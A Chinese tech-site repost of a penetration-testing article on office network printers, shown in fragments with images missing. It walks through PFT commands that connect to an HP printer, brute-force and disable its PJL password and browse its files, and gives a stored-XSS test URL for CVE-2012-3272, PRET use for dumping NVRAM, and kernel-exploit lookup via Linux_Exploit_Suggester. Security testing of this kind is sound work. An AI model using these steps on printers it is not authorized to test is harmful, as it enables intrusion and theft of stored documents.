加入收藏 | 设为首页 | 会员中心 | 我要投稿 核心网 (https://www.hxwgxz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 建站 > 正文

不可忽视的打印机漏洞研究

发布时间:2019-06-20 01:15:46 所属栏目:建站 来源:VoltCary
导读:一、前言 经过最近一段时间测试,发现企业内网打印机存在多种漏洞,同时也经常被大家所忽略,因此才有本文的研究。当一台打印机连接网络,可以进行端口扫描、读写上传恶意文件、反弹shell,相当于一台服务器。 常见攻击,信息泄露,如访问内存,可能发现密

根据文章前面部分,也大概知道了打印机攻击是基于打印机语言命令,如输入PJL命令造成相关,需要掌握PJL命令,输入PJL命令比较麻烦,这里有一个强大的打印机框架工具PFT, 而使用PFT工具可以无需掌握PJL命令,每一个参数已内置打印机语言,只需要调用对应参数来利用,配合help查看。

使用教程:

(1) PFT连接到打印机

  1. pft> server 192.168.15.200 
  2. Server set to 192.168.15.200 
  3. pft> port 9100 
  4. Port set to 9100 
  5. pft> connect 
  6. Connected to 192.168.15.200:9100 
  7. Device: hp LaserJet 4250 

(2) PFT清除PJL程序保护

清除成功之后,也能登录web控制台页面。

  1. pft> env bruteforce 
  2. try 30 
  3. INFO: force_recv_clear() timed out for 270bytes (10 sec) 
  4. Password disabled successfully 

(3) 查看硬盘文件

一般高级的打印机会有硬盘,如下命令查看有哪些盘符。

  1. pft> volumes 
  2. Volume       Size       Free        Location      Label     Status 
  3. 0:   12619776   11786240             RAM          ? READ-WRITE 

(4) ls查看文件

  1. pft> ls 
  2. 0: 
  3. .                             -          d 
  4. ..                            -          d 
  5. PostScript                    -          d 
  6. PJL                           -          d 
  7. saveDevice                    -          d 
  8. webServer                     -          d 

(5) 将文件下载到本地get 文件名

5. HP JetDirect打印机存储型XSS

攻击者必须访问HP镭射打印机配置页面,”Product_URL”和”Tech_URL”参数 存在漏洞,对应CVE号:CVE-2012-3272。

点击WEB的“支持信息” 连接,按如下输入:

image.png

点击“Apply”按钮,跳转到支持页面中(support.htm),出现弹框。

不可忽视的打印机漏洞研究

测试方法:

http://[server]/support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=[XSS]&Tech_URL=[XSS]&Apply=Apply

6. 打印控制任务

PERT连接到打印机,并尝试利用打印机所使用的打印机语言(目前支持PS,PJL和PCL),如python pret.py IP PS可尝试调用打印机PS语言进行操作,一旦使用PRET连接到打印机中的一个功能,我们将可以做很多事情。例如检查文件系统,创建目录,更改配置文件、dump整个NVRAM。

如输出打印“Foo”,执行cross topsecret Foo:

image.png

打印如下:

image.png

7. 固件漏洞

如果打印机不存在PJL命令执行漏洞,可针对固件漏洞测试,通过nmap发现固件版本,Linux_Exploit_Suggester.pl查询内核版本漏洞。

nmap扫描出如下:

image.png

执行perl Linux_Exploit_Suggester.pl -k 2.6.31:

image.png

PS:该工具只能查询内核3.4.4之前的漏洞信息。

github下载:

https://github.com/InteliSecureLabs/Linux_Exploit_Suggester

五、总结

(编辑:核心网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读